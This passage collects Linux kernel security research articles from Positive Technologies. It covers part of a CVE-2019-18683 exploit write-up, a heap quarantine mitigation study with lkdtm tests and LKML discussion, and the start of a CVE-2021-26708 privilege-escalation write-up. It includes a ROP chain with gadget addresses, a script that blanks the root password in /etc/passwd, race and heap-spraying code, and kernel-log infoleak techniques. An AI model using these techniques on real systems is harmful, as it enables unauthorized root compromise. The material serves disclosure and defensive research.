       memops->vaddr, &(memops->vaddr));

And the following diagram describes how the adapted payload parts are interconnected in the kernel memory:


ROP'n'JOP

Now let me describe the ROP chain that I created for these special circumstances.

As you can see, I've found an excellent stack-pivoting gadget that fits the void *(*vaddr)(void *buf_priv) prototype, where the control flow is hijacked. The buf_priv argument is taken from vb2_plane.mem_priv, which is under our control. In the Linux kernel on x86_64, the first function argument is passed via the RDI register, so the push rdi; pop rsp sequence switches the stack pointer to the controlled location (which is on the kernel stack as well, so SMAP and SMEP are bypassed).

Then comes the ROP chain for local privilege escalation. It is unusual because it is executed in the kernel thread context (as described earlier in this write-up).

#define ROP__PUSH_RDI__POP_RSP__pop_rbp__or_eax_edx__RET 0xffffffff814725f1
#define ROP__POP_R15__RET 0xffffffff81084ecf
#define ROP__POP_RDI__RET 0xffffffff8101ef05
#define ROP__JMP_R15 0xffffffff81c071be
#define ADDR_RUN_CMD 0xffffffff810b4ed0
#define ADDR_DO_TASK_DEAD 0xffffffff810bf260

unsigned long *rop = NULL;
char *cmd = "/bin/sh /home/a13x/pwn"; /* rewrites /etc/passwd dropping root pwd */
size_t cmdlen = strlen(cmd) + 1; /* for 0 byte */

/* mem_priv is the arg for vaddr() */
vplane = vbuf->vb.vb2_buf.planes;
vplane->mem_priv = (void *)(kstack - TIMEX_STACK_OFFSET + ROP_CHAIN_OFFSET);
rop = (unsigned long *)(timex_addr + ROP_CHAIN_OFFSET);
printf("  rop chain will be at %p, userspace %p\n", vplane->mem_priv, rop);

strncpy((char *)timex_addr + CMD_OFFSET, cmd, cmdlen);
printf("  cmd will be at %lx, userspace %p\n",
       (kstack - TIMEX_STACK_OFFSET + CMD_OFFSET),
       (char *)timex_addr + CMD_OFFSET);

/* stack will be trashed near rop chain, be careful with CMD_OFFSET */
*rop++ = 0x1337133713371337; /* placeholder for pop rbp in the pivoting gadget */
*rop++ = ROP__POP_R15__RET + kaslr_offset;
*rop++ = ADDR_RUN_CMD + kaslr_offset;
*rop++ = ROP__POP_RDI__RET + kaslr_offset;
*rop++ = (unsigned long)(kstack - TIMEX_STACK_OFFSET + CMD_OFFSET);
*rop++ = ROP__JMP_R15 + kaslr_offset;
*rop++ = ROP__POP_R15__RET + kaslr_offset;
*rop++ = ADDR_DO_TASK_DEAD + kaslr_offset;
*rop++ = ROP__JMP_R15 + kaslr_offset;

printf(" [+] the payload for kernel heap and stack is ready. Put it.\n");

This ROP chain loads the address of the kernel function run_cmd() from kernel/reboot.c into the R15 register. Then it saves the address of the shell command in the RDI register; that address will be passed to run_cmd() as an argument. Then the ROP chain performs some JOP'ing :) It jumps to run_cmd(), which executes /bin/sh /home/a13x/pwn with root privileges. That script rewrites /etc/passwd, allowing login as root without a password:

#!/bin/sh
# drop root password
sed -i '1s/.*/root::0:0:root:\/root:\/bin\/bash/' /etc/passwd

Finally, the ROP chain jumps to __noreturn do_task_dead() from kernel/exit.c. I do that to keep the system stable: if this kernel thread is not stopped, it provokes unnecessary kernel crashes.

Possible exploit mitigation

There are several kernel hardening features that could interfere with different parts of this exploit.

1. Setting /proc/sys/vm/unprivileged_userfaultfd to 0 would block the described method of keeping the payload in the kernelspace. That toggle restricts userfaultfd() to privileged users (those with the CAP_SYS_PTRACE capability).

2. Setting kernel.dmesg_restrict sysctl to 1 would block the infoleak via kernel log. That sysctl restricts the ability of unprivileged users to read the kernel syslog via dmesg. However, even with kernel.dmesg_restrict = 1, Ubuntu users from the adm group can read the kernel log from /var/log/syslog.

3. The grsecurity/PaX patch has an interesting feature called PAX_RANDKSTACK, which would force the exploit to guess the vb2_queue location:

+config PAX_RANDKSTACK
+	bool "Randomize kernel stack base"
+	default y if GRKERNSEC_CONFIG_AUTO && !(GRKERNSEC_CONFIG_VIRT_HOST && GRKERNSEC_CONFIG_VIRT_VIRTUALBOX)
+	depends on X86_TSC && X86
+	help
+	  By saying Y here the kernel will randomize every task's kernel
+	  stack on every system call. This will not only force an attacker
+	  to guess it but also prevent him from making use of possible
+	  leaked information about it.
+
+	  Since the kernel stack is a rather scarce resource, randomization
+	  may cause unexpected stack overflows, therefore you should very
+	  carefully test your system. Note that once enabled in the kernel
+	  configuration, this feature cannot be disabled on a per file basis.
+

 4. The PAX_RAP feature from the grsecurity/PaX patch should prevent the ROP/JOP chain described above.

 5. Hopefully, the Linux kernel will eventually get support for the ARM Memory Tagging Extension (MTE), which will mitigate use-after-free bugs similar to the one I exploited.

Conclusion

Investigating and fixing CVE-2019-18683, developing the PoC exploit, and writing this article has been a big deal for me.

I hope you have enjoyed reading it.

I want to thank Positive Technologies for giving me the opportunity to work on this research.

I would appreciate the feedback.

Author: Alexander Popov, Positive Technologies

Linux kernel heap quarantine versus use-after-free exploits


It's 2020. Quarantines are everywhere – and here I'm writing about one, too. But this quarantine is of a different kind.

In this article I'll describe the Linux Kernel Heap Quarantine that I developed for mitigating kernel use-after-free exploitation. I will also summarize the discussion about the prototype of this security feature on the Linux Kernel Mailing List (LKML).


Use-after-free in the Linux kernel

Use-after-free (UAF) vulnerabilities in the Linux kernel are very popular for exploitation, and there are many public exploit examples.

UAF exploits usually involve heap spraying. Generally speaking, this technique aims to put attacker-controlled bytes at a defined memory location on the heap. Heap spraying for exploiting UAF in the Linux kernel relies on the fact that when kmalloc() is called, the slab allocator returns the address of memory that was recently freed:


So allocating a kernel object with the same size and attacker-controlled contents allows overwriting the vulnerable freed object:


Note: Heap spraying for out-of-bounds exploitation is a separate technique.

An idea

In July 2020, I got an idea of how to break this heap spraying technique for UAF exploitation. In August I found some time to try it out. I extracted the slab freelist quarantine from KASAN functionality and called it SLAB_QUARANTINE.

If this feature is enabled, freed allocations are stored in the quarantine queue, where they wait to be actually freed. So there should be no way for them to be instantly reallocated and overwritten by UAF exploits. In other words, with SLAB_QUARANTINE, the kernel allocator behaves like so:


On August 13, I sent the first early PoC to LKML and started deeper research of its security properties.

Slab quarantine security properties

For researching the security properties of the kernel heap quarantine, I developed two lkdtm tests (code is available here).

The first test is called lkdtm_HEAP_SPRAY. It allocates and frees an object from a separate kmem_cache and then allocates 400,000 similar objects. In other words, this test attempts an original heap spraying technique for UAF exploitation:

#define SPRAY_LENGTH 400000

    ...
    addr = kmem_cache_alloc(spray_cache, GFP_KERNEL);
    ...
    kmem_cache_free(spray_cache, addr);
    pr_info("Allocated and freed spray_cache object %p of size %d\n",
                    addr, SPRAY_ITEM_SIZE);
    ...
    pr_info("Original heap spraying: allocate %d objects of size %d...\n",
                    SPRAY_LENGTH, SPRAY_ITEM_SIZE);
    for (i = 0; i < SPRAY_LENGTH; i++) {
        spray_addrs[i] = kmem_cache_alloc(spray_cache, GFP_KERNEL);
        ...
        if (spray_addrs[i] == addr) {
            pr_info("FAIL: attempt %lu: freed object is reallocated\n", i);
            break;
        }
    }

    if (i == SPRAY_LENGTH)
        pr_info("OK: original heap spraying hasn't succeeded\n");

If CONFIG_SLAB_QUARANTINE is disabled, the freed object is instantly reallocated and overwritten:

  # echo HEAP_SPRAY > /sys/kernel/debug/provoke-crash/DIRECT
   lkdtm: Performing direct entry HEAP_SPRAY
   lkdtm: Allocated and freed spray_cache object 000000002b5b3ad4 of size 333
   lkdtm: Original heap spraying: allocate 400000 objects of size 333...
   lkdtm: FAIL: attempt 0: freed object is reallocated

If CONFIG_SLAB_QUARANTINE is enabled, 400,000 new allocations don't overwrite the freed object:

  # echo HEAP_SPRAY > /sys/kernel/debug/provoke-crash/DIRECT
   lkdtm: Performing direct entry HEAP_SPRAY
   lkdtm: Allocated and freed spray_cache object 000000009909e777 of size 333
   lkdtm: Original heap spraying: allocate 400000 objects of size 333...
   lkdtm: OK: original heap spraying hasn't succeeded

That happens because pushing an object through the quarantine requires both allocating and freeing memory. Objects are released from the quarantine as new memory is allocated, but only when the quarantine size is over the limit. And the quarantine size grows when more memory is freed up.

That's why I created the second test, called lkdtm_PUSH_THROUGH_QUARANTINE. It allocates and frees an object from a separate kmem_cache and then performs kmem_cache_alloc()+kmem_cache_free() for that cache 400,000 times.

    addr = kmem_cache_alloc(spray_cache, GFP_KERNEL);
    ...
    kmem_cache_free(spray_cache, addr);
    pr_info("Allocated and freed spray_cache object %p of size %d\n",
                    addr, SPRAY_ITEM_SIZE);

    pr_info("Push through quarantine: allocate and free %d objects of size %d...\n",
                    SPRAY_LENGTH, SPRAY_ITEM_SIZE);
    for (i = 0; i < SPRAY_LENGTH; i++) {
        push_addr = kmem_cache_alloc(spray_cache, GFP_KERNEL);
        ...
        kmem_cache_free(spray_cache, push_addr);

        if (push_addr == addr) {
            pr_info("Target object is reallocated at attempt %lu\n", i);
            break;
        }
    }

    if (i == SPRAY_LENGTH) {
        pr_info("Target object is NOT reallocated in %d attempts\n",
                    SPRAY_LENGTH);
    }

This test effectively pushes the object through the heap quarantine and reallocates it after it returns back to the allocator freelist:

  # echo PUSH_THROUGH_QUARANTINE > /sys/kernel/debug/provoke-crash/DIRECT
   lkdtm: Performing direct entry PUSH_THROUGH_QUARANTINE
   lkdtm: Allocated and freed spray_cache object 000000008fdb15c3 of size 333
   lkdtm: Push through quarantine: allocate and free 400000 objects of size 333...
   lkdtm: Target object is reallocated at attempt 182994
  # echo PUSH_THROUGH_QUARANTINE > /sys/kernel/debug/provoke-crash/DIRECT
   lkdtm: Performing direct entry PUSH_THROUGH_QUARANTINE
   lkdtm: Allocated and freed spray_cache object 000000004e223cbe of size 333
   lkdtm: Push through quarantine: allocate and free 400000 objects of size 333...
   lkdtm: Target object is reallocated at attempt 186830
  # echo PUSH_THROUGH_QUARANTINE > /sys/kernel/debug/provoke-crash/DIRECT
   lkdtm: Performing direct entry PUSH_THROUGH_QUARANTINE
   lkdtm: Allocated and freed spray_cache object 000000007663a058 of size 333
   lkdtm: Push through quarantine: allocate and free 400000 objects of size 333...
   lkdtm: Target object is reallocated at attempt 182010

As you can see, the number of allocations needed to overwrite the vulnerable object is almost the same across runs. That would be good for stable UAF exploitation and should not be allowed. That's why I developed quarantine randomization, which required only small hackish changes to the heap quarantine mechanism.

The heap quarantine stores objects in batches. On startup, all quarantine batches are filled by objects. When the quarantine shrinks, I randomly choose and free half of objects from a randomly chosen batch. The randomized quarantine then releases the freed object at an unpredictable moment:

   lkdtm: Target object is reallocated at attempt 107884
   lkdtm: Target object is reallocated at attempt 265641
   lkdtm: Target object is reallocated at attempt 100030
   lkdtm: Target object is NOT reallocated in 400000 attempts
   lkdtm: Target object is reallocated at attempt 204731
   lkdtm: Target object is reallocated at attempt 359333
   lkdtm: Target object is reallocated at attempt 289349
   lkdtm: Target object is reallocated at attempt 119893
   lkdtm: Target object is reallocated at attempt 225202
   lkdtm: Target object is reallocated at attempt 87343

However, this randomization alone would not stop the attacker: the quarantine stores the attacker's data (the payload) in the sprayed objects! This means the reallocated and overwritten vulnerable object contains the payload until the next reallocation (very bad!).

This makes it important to erase heap objects before placing them in the heap quarantine. Moreover, filling them with zeros gives a chance to detect UAF accesses to non-zero data for as long as an object stays in the quarantine (nice!). That functionality already exists in the kernel; it's called init_on_free. I integrated it with CONFIG_SLAB_QUARANTINE as well.

During that work I found a bug: in CONFIG_SLAB, init_on_free happens too late. Heap objects go to the KASAN quarantine while still "dirty." I provided the fix in a separate patch.

For a deeper understanding of the heap quarantine's inner workings, I provided an additional patch, which contains verbose debugging (not for merge). It's very helpful, see the output example:

   quarantine: PUT 508992 to tail batch 123, whole sz 65118872, batch sz 508854
   quarantine: whole sz exceed max by 494552, REDUCE head batch 0 by 415392, leave 396304
   quarantine: data level in batches:
     0 - 77%
     1 - 108%
     2 - 83%
     3 - 21%
   ...
     125 - 75%
     126 - 12%
     127 - 108%
   quarantine: whole sz exceed max by 79160, REDUCE head batch 12 by 14160, leave 17608
   quarantine: whole sz exceed max by 65000, REDUCE head batch 75 by 218328, leave 195232
   quarantine: PUT 508992 to tail batch 124, whole sz 64979984, batch sz 508854
   ...

The heap quarantine PUT operation you see in this output happens during kernel memory freeing. The heap quarantine REDUCE operation happens during kernel memory allocation, if the quarantine size limit is exceeded. The kernel objects released from the heap quarantine return to the allocator freelist – they are actually freed. In this output, you can also see that on REDUCE, the quarantine releases some part of a randomly chosen object batch (see the randomization patch for more details).

What about performance?

I made brief performance tests of the quarantine PoC on real hardware and in virtual machines:

1. Network throughput test using iperf:
   server: iperf -s -f K
   client: iperf -c 127.0.0.1 -t 60 -f K

2. Scheduler stress test:
   hackbench -s 4000 -l 500 -g 15 -f 25 -P

3. Building the defconfig kernel:
   time make -j2

I compared vanilla Linux kernel in three modes:

  • init_on_free=off
  • init_on_free=on (upstreamed feature)
  • CONFIG_SLAB_QUARANTINE=y (which enables init_on_free)

Network throughput test with iperf showed that:

  • init_on_free=on gives 28.0 percent less throughput compared to init_on_free=off.
  • CONFIG_SLAB_QUARANTINE gives 2.0 percent less throughput compared to init_on_free=on.

Scheduler stress test:

  • With init_on_free=on, hackbench worked 5.3 percent slower versus init_on_free=off.
  • With CONFIG_SLAB_QUARANTINE, hackbench worked 91.7 percent slower versus init_on_free=on. Running this test in a QEMU/KVM virtual machine gave a 44.0 percent performance penalty, which is quite different from the results on real hardware (Intel Core i7-6500U CPU).

Building the defconfig kernel:

  • With init_on_free=on, the kernel build went 1.7 percent more slowly compared to init_on_free=off.
  • With CONFIG_SLAB_QUARANTINE, the kernel build was 1.1 percent slower compared to init_on_free=on.

As you can see, the results of these tests are quite diverse and depend on the type of workload.

Sidenote: There was NO performance optimization for this version of the heap quarantine prototype. My main effort was put into researching its security properties. I decided that performance optimization should be done further on down the road, assuming that my work is worth pursuing.

Counter-attack

My patch series got feedback on the LKML. I'm grateful to Kees Cook, Andrey Konovalov, Alexander Potapenko, Matthew Wilcox, Daniel Micay, Christopher Lameter, Pavel Machek, and Eric W. Biederman for their analysis.

And the main kudos go to Jann Horn, who reviewed the security properties of my slab quarantine mitigation and created a counter-attack that re-enabled UAF exploitation in the Linux kernel.

Amazingly, that discussion with Jann happened during Kees's Twitch stream in which he was testing my patch series (by the way, I recommend watching the recording).

Quoting the mailing list:

On 06.10.2020 21:37, Jann Horn wrote:
> On Tue, Oct 6, 2020 at 7:56 PM Alexander Popov wrote:
>> So I think the control over the time of the use-after-free access doesn't help
>> attackers, if they don't have an "infinite spray" -- unlimited ability to store
>> controlled data in the kernelspace objects of the needed size without freeing them.
   [...]
>> Would you agree?
>
> But you have a single quarantine (per CPU) for all objects, right? So
> for a UAF on slab A, the attacker can just spam allocations and
> deallocations on slab B to almost deterministically flush everything
> in slab A back to the SLUB freelists?

Aaaahh! Nice shot Jann, I see.

Another slab cache can be used to flush the randomized quarantine, so eventually
the vulnerable object returns into the allocator freelist in its cache, and
original heap spraying can be used again.

For now I think the idea of a global quarantine for all slab objects is dead.

I shared that in Kees's Twitch stream chat right away, and Kees adapted my PUSH_THROUGH_QUARANTINE test to implement this attack. It worked. Bang!

Further ideas

Jann proposed another idea for mitigating UAF exploitation in the Linux kernel. Kees, Daniel Micay, Christopher Lameter, and Matthew Wilcox commented on it. I'll give a few quotes from consecutive messages here to describe the idea. However, I recommend reading the whole discussion.

Jann:

  Things like preventing the reallocation of virtual kernel addresses
  with different types, such that an attacker can only replace a UAF object
  with another object of the same type.
  ...
  And, to make it more effective, something like a compiler plugin to
  isolate kmalloc(sizeof(<type>)) allocations by type beyond just size
  classes.

Kees:

  The large trouble are the kmalloc caches, which don't have types
  associated with them. Having implicit kmem caches based on the type
  being allocated there would need some pretty extensive plumbing, I
  think?

Jann:

  You'd need to teach the compiler frontend to grab type names from
  sizeof() and stuff that type information somewhere, e.g. by generating
  an extra function argument referring to the type, or something like that.

Daniel:

  It will reuse the memory for other things when the whole slab is freed
  though. Not really realistic to change that without it being backed by
  virtual memory along with higher-level management of regions to avoid
  intense fragmentation and metadata waste. It would depend a lot on
  having much finer-grained slab caches.

Christopher:

  Actually typifying those accesses may get rid of a lot of kmalloc
  allocations and could help to ease the management and control of objects.

  It may be a big task though given the ubiquity of kmalloc and the need to
  create a massive amount of new slab caches. This is going to reduce the
  cache hit rate significantly.

Conclusion

Prototyping a Linux kernel heap quarantine and testing it against use-after-free exploitation techniques was a quick and interesting research project. It didn't turn into a final solution suitable for the mainline, but it did give us useful results and ideas. I've written this article as a way to summarize these efforts for future reference.

And for now, let me finish with a tiny poem that I composed several days ago before going to sleep:

  Quarantine patch version three
  Won't appear. No need.
  Let's exploit use-after-free
  Like we always did ;)

        -- a13xp0p0v

Author: Alexander Popov, Positive Technologies


Four Bytes of Power: exploiting CVE-2021-26708 in the Linux kernel

Author: Alexander Popov, Positive Technologies

CVE-2021-26708 is assigned to five race condition bugs in the virtual socket implementation of the Linux kernel. I discovered and fixed them in January 2021. In this article I describe how to exploit them for local privilege escalation on Fedora 33 Server for x86_64, bypassing SMEP and SMAP. Today I gave a talk at Zer0Con 2021 on this topic (slides).


I like this exploit. The race condition can be leveraged for very limited memory corruption, which I gradually turn into arbitrary read/write of kernel memory, and ultimately full power over the system. That's why I titled this article "Four Bytes of Power."

Now the PoC demo video:

Vulnerabilities

These vulnerabilities are race conditions caused by faulty locking in net/vmw_vsock/af_vsock.c. The race conditions were implicitly introduced in November 2019 in the commits that added VSOCK multi-transport support. These commits were merged into Linux kernel version 5.5-rc1.

CONFIG_VSOCKETS and CONFIG_VIRTIO_VSOCKETS are shipped as kernel modules in all major GNU/Linux distributions. The vulnerable modules are automatically loaded when you create a socket for the AF_VSOCK domain:

    vsock = socket(AF_VSOCK, SOCK_STREAM, 0);

AF_VSOCK socket creation is available to unprivileged users without requiring user namespaces. Neat, right?

Bugs and fixes

I use the syzkaller fuzzer with custom modifications. On January 11, I saw that it got a suspicious kernel crash in virtio_transport_notify_buffer_size(). However, the fuzzer didn't manage to reproduce this crash, so I started inspecting the source code and developing the reproducer manually.

A few days later I found a confusing bug in vsock_stream_setsockopt() that looked intentional:

    struct sock *sk;
    struct vsock_sock *vsk;
    const struct vsock_transport *transport;

    /* ... */

    sk = sock->sk;
    vsk = vsock_sk(sk);
    transport = vsk->transport;

    lock_sock(sk);

That's strange. The pointer to the virtual socket transport is copied to a local variable before the lock_sock() call. But the vsk->transport value may change when the socket lock is not acquired! That is an obvious race condition bug. I checked the whole af_vsock.c file and found four more similar issues.

Searching the git history helped to understand the reason. Initially, the transport for a virtual socket was not able to change, so copying the value of vsk->transport to a local variable was safe. Later, the bugs were implicitly introduced by commit c0cfa2d8a788fcf4 (vsock: add multi-transports support) and commit 6a2c0962105ae8ce (vsock: prevent transport modules unloading).

Fixing this vulnerability is trivial: 

        sk = sock->sk;
        vsk = vsock_sk(sk);
-       transport = vsk->transport;

        lock_sock(sk);

+       transport = vsk->transport;

A bit odd vulnerability disclosure

On January 30, after finishing the PoC exploit, I created the fixing patch and made responsible disclosure to security@kernel.org. I got very prompt replies from Linus and Greg, and we settled on this procedure:

1. Sending my patch to the Linux Kernel Mailing List (LKML) in public.
2. Merging it upstream and backporting it to the affected stable trees.
3. Informing distributions about the security relevance of this issue via the linux-distros mailing list.
4. Making the disclosure via oss-security@lists.openwall.com, when allowed by the distributions.

The first step is questionable. Linus decided to merge my patch right away without any disclosure embargo because the patch "doesn't look all that different from the kinds of patches we do every day." I obeyed and proposed sending it to the LKML in public. Doing so is important because anybody can find kernel vulnerability fixes by filtering kernel commits that didn't appear on the mailing lists.

On February 2, the second version of my patch was merged into netdev/net.git and then came to Linus' tree. On February 4, Greg applied it to the affected stable trees. Then I immediately informed linux-distros@vs.openwall.org that the fixed bugs are exploitable and asked how much time the Linux distributions would need before I did public disclosure.

But I got the following reply:

    If the patch is committed upstream, then the issue is public.

    Please send to oss-security immediately.

A bit odd. Anyway, I then requested a CVE ID at https://cve.mitre.org/cve/request_id.html and made the announcement at oss-security@lists.openwall.com.

This raises the question: is this "merge ASAP" procedure compatible with the linux-distros mailing list?

As a counter-example, when I reported CVE-2017-2636 to security@kernel.org, Kees Cook and Greg organized a one-week disclosure embargo via the linux-distros mailing list. That allowed Linux distributions to integrate my fix into their security updates in no rush and release them simultaneously.

Memory corruption

Now let's focus on exploiting CVE-2021-26708. I exploited the race condition in vsock_stream_setsockopt(). Reproducing it requires two threads. The first one calls setsockopt():

    setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
               &size, sizeof(unsigned long));

The second thread should change the virtual socket transport while vsock_stream_setsockopt() is trying to acquire the socket lock. It is performed by reconnecting to the virtual socket: 

    struct sockaddr_vm addr = {
        .svm_family = AF_VSOCK,
    };

    addr.svm_cid = VMADDR_CID_LOCAL;
    connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));

    addr.svm_cid = VMADDR_CID_HYPERVISOR;
    connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));

To handle connect() for a virtual socket, the kernel executes vsock_stream_connect(), which calls vsock_assign_transport(). This function has some code we are interested in:

    if (vsk->transport) {
        if (vsk->transport == new_transport)
            return 0;

        /* transport->release() must be called with sock lock acquired.
         * This path can only be taken during vsock_stream_connect(),
         * where we have already held the sock lock.
         * In the other cases, this function is called on a new socket
         * which is not assigned to any transport.
         */
        vsk->transport->release(vsk);
        vsock_deassign_transport(vsk);
    }

Note that vsock_stream_connect() holds the socket lock. Meanwhile, vsock_stream_setsockopt() in a parallel thread is trying to acquire it. Good. This is what we need for hitting the race condition.

So, on the second connect() with a different svm_cid, the vsock_deassign_transport() function is called. The function executes the transport destructor virtio_transport_destruct() and thus frees vsock_sock.trans. At this point, you might guess that use-after-free is where all this is heading :) vsk->transport is set to NULL.

When vsock_stream_connect() releases the socket lock, vsock_stream_setsockopt() can proceed with execution. It calls vsock_update_buffer_size(), which subsequently calls transport->notify_buffer_size(). Here transport holds the out-of-date value from the local variable, which no longer matches vsk->transport (now NULL).

The kernel executes virtio_transport_notify_buffer_size(), corrupting kernel memory:

void virtio_transport_notify_buffer_size(struct vsock_sock *vsk, u64 *val)
{
    struct virtio_vsock_sock *vvs = vsk->trans;

    if (*val > VIRTIO_VSOCK_MAX_BUF_SIZE)
        *val = VIRTIO_VSOCK_MAX_BUF_SIZE;

    vvs->buf_alloc = *val;

    virtio_transport_send_credit_update(vsk, VIRTIO_VSOCK_TYPE_STREAM, NULL);
}


Here vvs is a pointer to kernel memory that was freed in virtio_transport_destruct(). The size of struct virtio_vsock_sock is 64 bytes, so the object lives in the kmalloc-64 slab cache. The buf_alloc field has type u32 and resides at offset 40. VIRTIO_VSOCK_MAX_BUF_SIZE is 0xFFFFFFFFUL. The value *val is controlled by the attacker, and its four least significant bytes are written to the freed memory.

"Fuzzing miracle"

As I mentioned, syzkaller didn't manage to reproduce this crash, and I had to develop the reproducer manually. But why did the fuzzer fail? Looking at vsock_update_buffer_size() gave the answer:

    if (val != vsk->buffer_size &&
        transport && transport->notify_buffer_size)
        transport->notify_buffer_size(vsk, &val);

    vsk->buffer_size = val;

The notify_buffer_size() handler is called only if val differs from the current buffer_size. In other words, setsockopt() performing SO_VM_SOCKETS_BUFFER_SIZE should be called with different size parameters each time. I used this fun hack to hit the memory corruption in my first reproducer (source code):

    struct timespec tp;
    unsigned long size = 0;

    clock_gettime(CLOCK_MONOTONIC, &tp);
    size = tp.tv_nsec;
    setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
               &size, sizeof(unsigned long));

Here, the size value is taken from the nanoseconds count returned by clock_gettime(), and it is likely to be different on each racing round. Upstream syzkaller without modifications doesn't do things like that. The values of syscall parameters are chosen when syzkaller generates the fuzzing input. They don't change when the fuzzer executes it on the target.

Anyway, I still don't completely understand how syzkaller managed to hit this crash ¯\_(ツ)_/¯ It looks like the fuzzer did some lucky multithreaded magic with SO_VM_SOCKETS_BUFFER_MAX_SIZE and SO_VM_SOCKETS_BUFFER_MIN_SIZE but then failed to reproduce it.

Idea! Maybe adding the ability to randomize some syscall arguments at runtime would allow syzkaller to spot more bugs like CVE-2021-26708. On the other hand, doing so could also make crash reproduction less stable.

Four bytes of power

This time I chose Fedora 33 Server as the exploitation target, with kernel version 5.10.11-200.fc33.x86_64. From the beginning, I was determined to bypass SMEP and SMAP.

To sum up, this race condition may cause write-after-free of a 4-byte controlled value to a 64-byte kernel object at offset 40. That's quite limited memory corruption. I had a hard time turning it into a real weapon. I'm going to describe the exploit based on its development timeline.

The photos come from artifacts in the collection of Russia's State Hermitage Museum. I love this wonderful museum!

As a first step, I started to work on stable heap spraying. The exploit should perform some userspace activity that makes the kernel allocate another 64-byte object at the location of the freed virtio_vsock_sock. That way, 4-byte write-after-free should corrupt the sprayed object (instead of unused free kernel memory).

I set up some quick experimental spraying with the add_key syscall. I called it several times right after the second connect() to the virtual socket, while a parallel thread finishes the vulnerable vsock_stream_setsockopt(). Tracing the kernel allocator with ftrace allowed confirming that the freed virtio_vsock_sock is overwritten. In other words, I saw that successful heap spraying was possible.

The next step in my exploitation strategy was to find a 64-byte kernel object that can provide a stronger exploit primitive when it has four corrupted bytes at offset 40. Huh… not so easy!

My first thought was to employ the iovec technique from the Bad Binder exploit by Maddie Stone and Jann Horn. The essence of it is to use a carefully corrupted iovec object for arbitrary read/write of kernel memory. However, I got a triple fail with this idea:

1.   64-byte iovec is allocated on the kernel stack, not the heap.

2.   Four bytes at offset 40 overwrite iovec.iov_len (not iovec.iov_base), so the original approach can't work.

3.   This iovec exploitation trick has been dead since Linux kernel version 4.13. Awesome Al Viro killed it with commit 09fc68dc66f7597b back in June 2017:

    we have *NOT* done access_ok() recently enough; we rely upon the
    iovec array having passed sanity checks back when it had been created
    and not nothing having buggered it since.  However, that's very much
    non-local, so we'd better recheck that.

After exhausting experiments with a handful of other kernel objects suitable for heap spraying, I found the msgsnd() syscall. It creates struct msg_msg in the kernelspace, see the pahole output:

struct msg_msg {
        struct list_head           m_list;               /*     0    16 */
        long int                   m_type;               /*    16     8 */
        size_t                     m_ts;                 /*    24     8 */
        struct msg_msgseg *        next;                 /*    32     8 */
        void *                     security;             /*    40     8 */

        /* size: 48, cachelines: 1, members: 5 */
        /* last cacheline: 48 bytes */
};

That is the message header, which is followed by message data. If struct msgbuf in the userspace has a 16-byte mtext, the corresponding msg_msg is created in the kmalloc-64 slab cache, just like struct virtio_vsock_sock. The 4-byte write-after-free can corrupt the void *security pointer at offset 40. Using the security field to break Linux security: irony itself!
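These numbers are easy to verify in userspace with a replica of the header (an illustrative replica of the x86_64 layout above, not the kernel's own definition):

```c
#include <stddef.h>

/* Userspace replica of the kernel msg_msg header, following the
 * pahole output above (struct list_head is two pointers). */
struct list_head_replica { void *next, *prev; };

struct msg_msg_replica {
    struct list_head_replica m_list;   /* offset  0, 16 bytes */
    long                     m_type;   /* offset 16 */
    size_t                   m_ts;     /* offset 24 */
    void                    *next;     /* offset 32 */
    void                    *security; /* offset 40 */
};

/* Header plus inline message data: a 16-byte mtext gives a 64-byte
 * allocation, i.e. the kmalloc-64 slab cache. */
size_t msg_alloc_size(size_t mtext_len)
{
    return sizeof(struct msg_msg_replica) + mtext_len;
}
```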

The msg_msg.security field points to the kernel data allocated by lsm_msg_msg_alloc() and used by SELinux in the case of Fedora. It is freed by security_msg_msg_free() when msg_msg is received. Hence corrupting the first half of the security pointer (least significant bytes on little-endian x86_64) provides arbitrary free, which is a much stronger exploit primitive.


Kernel infoleak as a bonus

After achieving arbitrary free, I started to think about where to aim it—what could I free? Here I used the same trick as I did in the CVE-2019-18683 exploit. As I mentioned earlier, the second connect() to the virtual socket calls vsock_deassign_transport(), which sets vsk->transport to NULL. That makes the vulnerable vsock_stream_setsockopt() show a kernel warning when it calls virtio_transport_send_pkt_info() just after the memory corruption:

WARNING: CPU: 1 PID: 6739 at net/vmw_vsock/virtio_transport_common.c:34
...
CPU: 1 PID: 6739 Comm: racer Tainted: G        W         5.10.11-200.fc33.x86_64 #1
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.13.0-2.fc32 04/01/2014
RIP: 0010:virtio_transport_send_pkt_info+0x14d/0x180 [vmw_vsock_virtio_transport_common]
...
RSP: 0018:ffffc90000d07e10 EFLAGS: 00010246
RAX: 0000000000000000 RBX: ffff888103416ac0 RCX: ffff88811e845b80
RDX: 00000000ffffffff RSI: ffffc90000d07e58 RDI: ffff888103416ac0
RBP: 0000000000000000 R08: 00000000052008af R09: 0000000000000000
R10: 0000000000000126 R11: 0000000000000000 R12: 0000000000000008
R13: ffffc90000d07e58 R14: 0000000000000000 R15: ffff888103416ac0
FS:  00007f2f123d5640(0000) GS:ffff88817bd00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f81ffc2a000 CR3: 000000011db96004 CR4: 0000000000370ee0
Call Trace:
  virtio_transport_notify_buffer_size+0x60/0x70 [vmw_vsock_virtio_transport_common]
  vsock_update_buffer_size+0x5f/0x70 [vsock]
  vsock_stream_setsockopt+0x128/0x270 [vsock]
...

A quick debugging session with gdb showed that the RCX register contains the kernel address of the freed virtio_vsock_sock and the RBX register contains the kernel address of vsock_sock. Excellent! On Fedora I can open and parse /dev/kmsg: if one more warning appears in the kernel log, then the exploit won one more race and it can extract the corresponding kernel addresses from the registers.


From arbitrary free to use-after-free

My exploitation plan was to use arbitrary free for use-after-free:

1.   Free an object at the kernel address leaked in the kernel warning.

2.   Perform heap spraying to overwrite that object with controlled data.

3.   Do privilege escalation using the corrupted object.

At first, I wanted to exploit arbitrary free against the vsock_sock address (from RBX), because this is a big structure that contains a lot of interesting things. But that didn't work, since it lives in a dedicated slab cache where I can't perform heap spraying. So I don't know whether use-after-free exploitation on vsock_sock is possible.

